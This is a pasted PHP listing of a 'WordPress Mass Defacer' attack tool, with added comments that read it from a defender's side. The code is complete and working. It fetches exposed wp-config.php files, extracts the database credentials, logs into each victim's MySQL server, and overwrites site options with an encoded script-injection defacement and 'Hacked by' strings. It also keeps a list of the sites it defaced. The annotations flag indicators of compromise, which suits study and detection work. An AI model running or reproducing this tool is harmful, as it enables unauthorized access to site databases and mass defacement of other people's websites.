
Untitled

a guest
Jun 14th, 2017
<?php
/**
* @author: FaisaL Ahmed aka rEd X
* @mail: me@faialahmed.me
* @Last Updated: 19 July 2015
*/

/*
 * Analyst notes (defensive reading of this listing):
 * - Single-page web form. POST field `url` carries a newline-separated list of
 *   URLs; the body fetched from each is parsed as WordPress wp-config.php text.
 *   POST field `index` carries the HTML that is written into the target database.
 * - For each fetched config the script opens a MySQL session with the credentials
 *   found in it and rewrites rows of `<table_prefix>options`.
 * - Rows written: widget_text, sidebars_widgets, blogname, blogdescription,
 *   blog_charset. Row read: siteurl. Local artefact: list.txt (append mode).
 * - Preconditions visible in the code: the config text must be retrievable via a
 *   URL, and DB_HOST must accept connections from the host running this page.
 *   Keeping config copies and backups out of the web root and not exposing MySQL
 *   beyond the application host removes both.
 * - Uses the legacy mysql_* extension, which was removed in PHP 7.
 */

// Removes PHP's execution time limit for this request.
set_time_limit(0);
// Turns off on-page PHP error output.
ini_set('display_errors', 0);

// Page head. The fixed <title>/<meta> strings are usable as a content signature
// when scanning web roots; rendering the page also requests a favicon, a font and
// a stylesheet from the third-party hosts named in the markup.
echo '<html><head>
<title>WordPress Mass Defacer | 3xp1r3 Cyber Army</title>
<meta content="text/html; charset=utf-8">
<meta name="keywords" content="WordPress Defacer, 3xp1r3, 3xp1r3 Cyber Army, rEd X" />
<meta name="description" content="WordPress Defacer" />
<meta name="author" content="rEd X" />
<link rel="SHORTCUT ICON" href="http://us.yimg.com/i/mesg/emoticons7/61.gif">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
</head><body>';

echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Defacer<br><sub>3xp1r3 Cyber Army</sub></div><br/>';

// Input form: textarea `url`, textarea `index`, hidden field action=1.
echo '<form method="POST" action="" ><center><table border="1">
<tr><td>Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
<tr><td>Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
<br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';

// Processing starts only when action=1 is posted. No authentication or CSRF check
// precedes it, so anyone who can reach this page can drive it.
if ($_POST['action']=='1'){
if ($_POST['url']==''){
echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
}else{
$url=$_POST['url'];
// One URL per line; each is trimmed and fetched with the curl helper below.
$users = explode("\n",$url);
foreach ($users as $user) {
$user1=trim($user);
$code=file_get_contents2($user1);
// Pull DB_NAME / DB_USER / DB_PASSWORD / DB_HOST and $table_prefix out of the
// fetched text (case-insensitive, dot-all, ungreedy). Only the first match of each
// is used and there is no check that a match exists.
preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
$db=$b1[1][0];
preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
// Note: this overwrites the foreach loop variable $user with the DB user name.
$user=$b2[1][0];
preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
$db_password=$b3[1][0];
preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
$host=$b4[1][0];
preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
$p=$b5[1][0];

// `@` hides connection errors; entries that fail to connect are skipped silently.
$d=@mysql_connect( $host, $user, $db_password ) ;
if ($d){
@mysql_select_db($db );
// Posted HTML, slashes stripped, then every byte percent-encoded by strToHex().
$source=stripslashes($_POST['index']);
$s2=strToHex(($source));
// Detection point: a text widget whose value contains
// `document.documentElement.innerHTML = unescape(` followed by a %xx blob.
$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
// Length used in the serialized string below; presumably the -2 accounts for the
// two doubled quotes collapsing inside the SQL literal (confirm).
$ls=strlen($s)-2;
// Overwrites the serialized `widget_text` option with one text widget holding $s.
// The statement is built by string concatenation with the parsed table prefix.
$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
mysql_query($sql) ;
// Overwrites `sidebars_widgets`: sidebar-1 is left with only text-2, and the six
// listed default widgets are moved to wp_inactive_widgets.
$sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
mysql_query($sql) ;
// Runs only where mbstring is available on the host executing this page.
if (function_exists("mb_convert_encoding") )
{
// $source2 is built and escaped here but is not referenced by any query below.
$source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
$source2=mysql_real_escape_string($source2);
// Fixed strings written to blogname / blogdescription: usable as database IoCs.
$sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked by Zedan' WHERE `option_name` = 'blogname';"; // Change rEd X to your Nick
@mysql_query($sql) ; ;
$sql = "UPDATE `".$p."options` SET `option_value` = 'Was Here' WHERE `option_name` = 'blogdescription';"; // Change rEd X to your Nick
@mysql_query($sql) ; ;
// WordPress sets blog_charset to UTF-8 by default, so a UTF-7 value in this row is
// worth alerting on.
$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
@mysql_query($sql) ; ;
}
// Reads the site's own URL back from the options table for the local log.
$aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
$siteurl=@mysql_fetch_array($aa) ;
$siteurl=$siteurl['option_value'];
// $tr is appended to without ever being initialised.
$tr.="$siteurl\n";
mysql_close();
}
}
// The unbraced `if` governs only the $filename assignment; the fopen/fputs/fclose
// calls and both echo statements below run whether or not $tr is set.
if ($tr)
$filename = 'list.txt';
// Appends the collected site URLs to list.txt (relative path). On a host where this
// page was staged, that file is an artefact listing the sites that were modified.
$fp = fopen($filename, "a+");
$write = fputs($fp, $tr);
fclose($fp);
echo "<div class='result'>Defacing Completed ! :)<br><br>";
echo "<a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
//echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
}
}
  89. function strToHex($string)
  90. {
  91. $hex='';
  92. for ($i=0; $i < strlen($string); $i++)
  93. {
  94. if (strlen(dechex(ord($string[$i])))==1){
  95. $hex .="%0". dechex(ord($string[$i]));
  96. }
  97. else
  98. {
  99. $hex .="%". dechex(ord($string[$i]));
  100. }
  101. }
  102. return $hex;
  103. }
  105. function file_get_contents2($u){
  106.  
  107. $ch = curl_init();
  108. curl_setopt($ch,CURLOPT_URL,$u);
  109. curl_setopt($ch, CURLOPT_HEADER, 0);
  110. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  111. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  112. $result = curl_exec($ch);
  113. return $result ;
  114. }
  115. echo "<br><br>&#169; rEd X | 3xp1r3 Cyber Army";
  116. ?>